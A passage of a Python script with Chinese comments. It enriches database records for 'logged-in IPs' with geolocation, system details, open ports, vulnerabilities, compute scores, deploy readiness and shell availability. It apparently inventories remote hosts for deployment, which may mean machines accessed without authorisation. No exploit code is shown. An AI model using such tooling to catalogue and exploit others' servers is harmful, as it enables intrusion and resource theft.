print(f" {i}. {issue}")
# 组装更新文档
update_doc = {
# 地理信息
"geo": {
"country": geo["country"],
"country_code": geo["country_code"],
"province": geo["province"],
"city": geo["city"],
"isp": geo["isp"],
"org": geo["org"],
"as_number": geo["as_number"],
"as_name": geo["as_name"],
"latitude": geo["latitude"],
"longitude": geo["longitude"],
"timezone": geo["timezone"],
},
"region": region_str,
# 连接验证
"connection_verified": verified,
"last_verify_time": datetime.now(),
# 系统信息
"sysinfo": {
"hostname": sysinfo["hostname"],
"kernel": sysinfo["kernel"],
"arch": sysinfo["arch"],
"os_release": sysinfo["os_release"],
"cpu_model": sysinfo["cpu_model"],
"cpu_cores": sysinfo["cpu_cores"],
"cpu_threads": sysinfo["cpu_threads"],
"cpu_freq_mhz": sysinfo["cpu_freq_mhz"],
"ram_total_mb": sysinfo["ram_total_mb"],
"ram_used_mb": sysinfo["ram_used_mb"],
"ram_free_mb": sysinfo["ram_free_mb"],
"swap_total_mb": sysinfo["swap_total_mb"],
"swap_used_mb": sysinfo["swap_used_mb"],
"disk_total_gb": sysinfo["disk_total_gb"],
"disk_used_gb": sysinfo["disk_used_gb"],
"disk_free_gb": sysinfo["disk_free_gb"],
"uptime_seconds": sysinfo["uptime_seconds"],
"uptime_human": sysinfo["uptime_human"],
"load_avg": sysinfo["load_avg"],
"network_interfaces": sysinfo["network_interfaces"],
"public_ip_verified": sysinfo["public_ip_verified"],
"docker_installed": sysinfo["docker_installed"],
"docker_version": sysinfo["docker_version"],
"python_version": sysinfo["python_version"],
},
# 开放端口
"open_ports": {str(p): svc for p, svc in sorted(open_ports.items())},
"open_port_count": len(open_ports),
"port_banners": banners,
# 漏洞信息
"vulnerabilities": all_vulns,
"vulnerability_count": len(all_vulns),
"critical_vuln_count": matrix_fields["critical_vuln_count"],
# 算力矩阵业务字段
"compute_score": matrix_fields["compute_score"],
"compute_score_details": matrix_fields["compute_score_details"],
"compute_grade": matrix_fields["compute_grade"],
"recommended_roles": matrix_fields["recommended_roles"],
"deploy_ready": matrix_fields["deploy_ready"],
"deploy_blockers": matrix_fields["deploy_blockers"],
"security_risk": matrix_fields["security_risk"],
"network_exposure": matrix_fields["network_exposure"],
"inferred_usage": matrix_fields["inferred_usage"],
"node_status": matrix_fields["node_status"],
"shell_available": matrix_fields.get("shell_available", False),
"shell_type": matrix_fields.get("shell_type", ""),
# 问题诊断
"issues": issues,
"issue_count": len(issues),
# 元数据
"enhance_time": datetime.now(),
"enhance_version": "1.0",
}
if not dry_run:
return update_doc
else:
return None
async def main():
parser = argparse.ArgumentParser(description="已登录IP深度增强分析")
parser.add_argument("--ip", help="仅处理指定IP")
parser.add_argument("--dry-run", action="store_true", help="仅分析不写库")
parser.add_argument("--verbose", "-v", action="store_true")
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.WARNING,
format="%(asctime)s [%(levelname)s] %(message)s"
)
import pymongo
client = pymongo.MongoClient(MONGO_URI)
db = client[MONGO_DB]
coll = db[MONGO_COLLECTION]
# 查询目标
query = {}
if args.ip:
query["ip"] = args.ip
docs = list(coll.find(query))
print(f"\n{'#'*60}")
print(f" 已登录IP深度增强分析 v1.0")
print(f" 目标: {len(docs)} 个IP")
print(f" 模式: {'试运行' if args.dry_run else '正式写库'}")
print(f"{'#'*60}")
if not docs:
print("[!] 无目标IP")
sys.exit(1)
start_time = time.time()
results = []
for doc in docs:
update_doc = await enhance_single_ip(doc, dry_run=args.dry_run)
if update_doc and not args.dry_run:
coll.update_one(
{"ip": doc["ip"]},
{"$set": update_doc}
)
print(f"\n >>> MongoDB已更新: {doc['ip']}")
results.append(doc["ip"])
elapsed = time.time() - start_time
print(f"\n{'#'*60}")
print(f" 分析完成!")
print(f" 处理IP数: {len(docs)}")
print(f" 已更新: {len(results)}")
print(f" 耗时: {elapsed:.1f}")
if results:
print(f" 已更新的IP: {', '.join(results)}")
print(f"{'#'*60}")
# 打印最终数据结构摘要
if results:
print(f"\n === 新增字段清单 ===")
print(f" 地理信息: geo.country/province/city/isp/org/as_number/latitude/longitude")
print(f" 区域简写: region (国家|省|市)")
print(f" 连接验证: connection_verified, last_verify_time")
print(f" 系统信息: sysinfo.hostname/kernel/os_release/cpu_*/ram_*/disk_*/uptime_*/docker_*/python_version")
print(f" 开放端口: open_ports, open_port_count, port_banners")
print(f" 漏洞信息: vulnerabilities[], vulnerability_count, critical_vuln_count")
print(f" 算力评估: compute_score/compute_grade/recommended_roles")
print(f" 部署状态: deploy_ready/deploy_blockers/node_status")
print(f" 安全评估: security_risk/network_exposure")
print(f" 用途推测: inferred_usage")
print(f" 问题诊断: issues[], issue_count")
print(f" 元数据: enhance_time, enhance_version")
client.close()
if __name__ == "__main__":
asyncio.run(main())